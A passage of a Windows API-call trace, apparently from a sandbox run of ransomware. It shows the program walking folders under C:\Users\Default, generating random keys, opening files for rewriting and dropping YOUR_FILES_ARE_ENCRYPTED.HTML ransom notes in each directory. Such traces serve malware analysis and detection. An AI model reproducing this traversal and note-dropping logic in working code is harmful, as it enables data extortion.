(in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x175548fb, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x175548fb, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x175548fb, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0171.240] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures") returned 42 [0171.240] GetProcessHeap () returned 0x270000 [0171.240] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 
[0171.240] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures" [0171.240] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*" [0171.240] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x74fa010, ftCreationTime.dwLowDateTime=0x431df40, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebdbb4, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="ꀐݏ")) returned 0xffffffff [0171.240] GetProcessHeap () returned 0x270000 [0171.240] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.240] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x175548fb, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x175548fb, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x175548fb, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0171.241] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Videos") returned 40 [0171.241] GetProcessHeap () returned 0x270000 [0171.241] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 
0x7690008 [0171.241] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Default\\Documents\\My Videos" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Videos") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Videos" [0171.241] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Videos", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*") returned="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*" [0171.241] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Videos\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x74fa010, ftCreationTime.dwLowDateTime=0x431df40, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebdbb4, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="ꀐݏ")) returned 0xffffffff [0171.241] GetProcessHeap () returned 0x270000 [0171.241] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.241] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x175548fb, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x175548fb, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x175548fb, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0171.241] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.243] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 60 [0171.243] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\documents\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.246] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.248] CloseHandle (hObject=0x5a0) returned 1 [0171.249] GetProcessHeap () returned 0x270000 [0171.249] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.249] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f027ae, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0171.250] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads") returned 30 [0171.250] GetProcessHeap () returned 0x270000 [0171.250] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.250] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Downloads" | out: lpString1="\\\\?\\C:\\Users\\Default\\Downloads") returned="\\\\?\\C:\\Users\\Default\\Downloads" [0171.250] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Downloads", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Downloads\\*") returned="\\\\?\\C:\\Users\\Default\\Downloads\\*" [0171.250] 
FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f027ae, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.250] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f027ae, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.250] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f027ae, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.250] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini") returned 42 [0171.250] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.250] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.250] lstrlenW (lpString=".ini") returned 4 [0171.250] PathFindExtensionW 
(pszPath="desktop.ini") returned=".ini" [0171.250] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4f027ae, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0171.251] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0171.251] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Downloads\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 60 [0171.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\downloads\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0171.251] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0171.254] CloseHandle (hObject=0x5a0) returned 1 [0171.254] GetProcessHeap () returned 0x270000 [0171.255] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0171.255] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0171.255] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites") returned 30 [0171.255] GetProcessHeap () returned 0x270000 [0171.255] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0171.255] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\Default\\Favorites" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites") returned="\\\\?\\C:\\Users\\Default\\Favorites" [0171.255] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\*" [0171.255] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0171.258] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa11f028, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.258] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: 
lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.259] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini") returned 42 [0171.259] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.259] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.259] lstrlenW (lpString=".ini") returned 4 [0171.259] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.259] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acb9862, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Links", cAlternateFileName="")) returned 1 [0171.259] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links") returned 36 [0171.259] GetProcessHeap () returned 0x270000 [0171.259] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0171.259] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Links" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links" [0171.259] lstrcatW (in: 
lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*" [0171.259] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acb9862, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0171.259] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8acb9862, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.259] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ac93702, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.259] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini") returned 48 [0171.259] lstrcmpW (lpString1="desktop.ini", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.259] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.259] lstrlenW (lpString=".ini") returned 4 [0171.259] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.260] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad77f44, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x60, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0171.260] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url") returned 58 [0171.260] lstrcmpW (lpString1="Web Slice Gallery.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.260] PathFindExtensionW (pszPath="Web Slice Gallery.url") returned=".url" [0171.260] lstrlenW (lpString=".url") returned 4 [0171.260] PathFindExtensionW (pszPath="Web Slice Gallery.url") returned=".url" [0171.260] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.260] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=226) returned 1 [0171.260] CloseHandle (hObject=0x600) returned 1 [0171.260] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: 
lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad77f44, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x60, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0171.260] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0171.260] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 66 [0171.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\favorites\\links\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5f8 [0171.261] WriteFile (in: hFile=0x5f8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0171.263] CloseHandle (hObject=0x5f8) returned 1 [0171.263] GetProcessHeap () returned 0x270000 [0171.264] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0171.264] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, 
cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0171.264] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites") returned 49 [0171.264] GetProcessHeap () returned 0x270000 [0171.264] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0171.264] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites" [0171.264] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*" [0171.264] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0171.298] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc8e9ac0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a464b53, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.304] 
FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a30def0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x60, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0171.304] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 68 [0171.304] lstrcmpW (lpString1="IE Add-on site.url", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.304] PathFindExtensionW (pszPath="IE Add-on site.url") returned=".url" [0171.304] lstrlenW (lpString=".url") returned 4 [0171.304] PathFindExtensionW (pszPath="IE Add-on site.url") returned=".url" [0171.304] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0171.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x600 [0171.305] GetFileSizeEx (in: hFile=0x600, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=133) returned 1 [0171.305] CloseHandle (hObject=0x600) returned 1 [0171.305] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc95bee0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc95bee0, ftLastAccessTime.dwHighDateTime=0x1d70517, 
